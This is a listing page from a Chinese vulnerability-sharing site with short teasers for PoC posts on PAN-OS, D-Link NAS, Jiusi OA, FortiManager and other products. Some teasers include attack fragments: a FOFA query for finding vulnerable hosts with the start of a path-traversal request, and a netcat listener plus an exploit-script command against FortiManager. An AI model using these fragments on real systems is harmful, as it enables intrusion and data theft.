安全漏洞 - 第 118 | CN-SEC 中文网

CVE-2024-0012｜Palo Alto Networks PAN-OS身份验证绕过漏洞（POC）

0x00 前言派拓网络（Palo Alto Networks）是一家网络安全公司，总部位于美国加利福尼亚州圣克拉拉市。公司的核心产品为“下一代防火墙”（Next-Generation Firewall...

11月23日安全漏洞102 views评论

阅读全文

安全漏洞

微信活码系统 ucenter/index SQL注入漏洞 PoC

0x02 产品介绍微信活码系统是基于微信平台的二维码管理系统，旨在帮助企业和个人实现更高效的社群运营和流量管理。可以将多个二维码合并成一个二维码的工具，用户扫描该固定二维码后，可以看到...

11月23日48 views评论

阅读全文

安全漏洞

D-Link NAS设备 account_mgr.cgi 未授权RCE漏洞(CVE-2024-10914) Poc

00产品简介D-Link NAS设备是一种基于网络的存储解决方案，作为网络存储设备，旨在为企业提供大容量的存储空间，并通过网络连接实现数据的访问和管理。 01漏洞概述D-Link NAS...

11月23日72 views评论

阅读全文

安全漏洞

PostgreSQL代码执行漏洞

0x00 漏洞编号CVE-2024-109790x01 危险等级高危0x02 漏洞概述PostgreSQL是一个免费的对象-关系数据库服务器，它的Slogan是“世界上最先进的开源关系型数据库”。它具...

11月23日58 views评论

阅读全文

安全漏洞

D-Link NAS设备远程代码执行漏洞

0x00 漏洞编号CVE-2024-109150x01 危险等级高危0x02 漏洞概述D-Link NAS设备是一类专门设计用于家庭和小型企业的网络存储设备。0x03 漏洞详情CVE-2024-109...

11月23日18 views评论

阅读全文

安全漏洞

九思OA dl.jsp 任意文件读取漏洞复现及POC

FOFAbody="/jsoa/login.jsp"漏洞复现将payload进行base64编码POCPOST /jsoa/dl.jsp?JkZpbGVOYW1lPS4uLy4uLy4uL1dFQi1...

11月22日47 views评论

阅读全文

安全漏洞

电信网关配置管理系统任意文件上传漏洞

0x00 漏洞编号暂无0x01 危险等级高危0x02 漏洞概述电信网关配置管理系统是一个用于管理和配置电信网络中网关设备的软件系统。它可以帮助网络管理员实现对网关设备的远程监控、配置、升级和故障排除等...

11月22日47 views评论

阅读全文

安全漏洞

东胜物流软件SQL注入漏洞

0x00 漏洞编号暂无0x01 危险等级高危0x02 漏洞概述东胜物流软件是青岛东胜伟业软件有限公司Q一款集订单管理、仓库管理、运输管理等多种功能于一体的物流管理软件。0x03 漏洞详情漏洞类型：SQ...

11月22日7 views评论

阅读全文

安全漏洞

用友U8CRM SQL注入漏洞

0x00 漏洞编号暂无0x01 危险等级高危0x02 漏洞概述用友U8CRM是一款功能全面、灵活定制的客户关系管理软件，能够帮助企业建立健全、改善与客户之间的关系，提高客户满意度和获利能力。0x03 ...

11月22日17 views评论

阅读全文

安全漏洞

CVE-2024-47575 Fortinet FortiManager RCE exp(FortiJump)

漏洞利用方法首先，建立您的 ncat 会话：nc -lvvnp 80然后，执行我们的检测工件生成器：python3 CVE-2024-47575.py--target192.168.1.110--lh...

11月22日31 views评论

阅读全文

安全漏洞

九思OA dl任意文件读取漏洞 PoC

简介九思OA产品由北京九思协同软件有限公司（简称九思软件）研发，专为企事业单位和政府机关提供高端协同办公解决方案，助力客户实现信息化、数字化及智能化转型。该产品融合多种管理理念与OA接口技术，旨在帮助...

11月22日31 views评论

阅读全文

安全漏洞

索贝融媒体 Sc-TaskMonitoring/rest/task/search SQL注入漏洞 PoC

0x02 产品介绍索贝融媒体产品是成都索贝数码科技股份有限公司（简称索贝）为各级电视台和媒体机构打造的一套集互联网和电视融合生产的解决方案。其代表产品为MCH2.0融合媒体生产业务系统...

11月22日54 views评论

阅读全文

在线咨询

微信